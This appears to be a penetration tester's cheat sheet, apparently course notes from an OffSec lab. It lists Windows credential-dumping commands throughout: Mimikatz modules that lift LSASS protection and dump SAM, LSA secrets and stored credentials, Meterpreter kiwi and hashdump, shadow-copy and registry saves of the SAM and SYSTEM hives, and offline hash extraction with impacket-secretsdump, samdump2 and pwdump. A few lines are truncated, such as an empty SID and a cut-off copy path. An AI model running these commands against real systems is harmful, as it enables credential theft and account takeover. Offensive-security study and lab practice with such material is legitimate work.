whoami /user
privilege::debug
token::elevate
!+
!processprotect /process:lsass.exe /remove
sekurlsa::credman
lsadump::sam
lsadump::secrets
privilege::debug
lsadump::lsa /patch
lsadump::lsa /inject
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
python pwdump.py /home/kali/system /home/kali/sam
$env:computername
[wmi] "Win32_userAccount.Domain='',Name='Administrator'"
S-1-5-21--
copy \\? C:\users\offsec.corp1\Downloads\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system